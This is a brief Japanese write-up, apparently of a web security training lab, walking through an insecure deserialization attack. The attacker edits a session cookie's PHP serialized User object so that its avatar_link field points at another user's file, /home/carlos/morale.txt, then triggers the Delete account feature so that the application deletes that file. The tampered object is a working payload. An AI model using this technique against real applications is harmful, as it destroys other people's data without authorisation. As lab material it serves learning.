Hello there, ('ω')ノ
アプリケーション機能を使用して安全でない逆シリアル化の悪用を。
まずは、ログインして。
My accountで、Delete accountを。
インターセプトして、Cookieをデコーダへ。
デコードした結果を以下のようディレクトリと文字数を変更して。
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"dkvew8nzaolj4hpua1yuo9vx7aih566d";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
今度は、逆にエンコードして。
エンコードしたCookieと入れ替えてインターセプトをオフにすると。
クリアできた。
Best regards, (^^ゞ
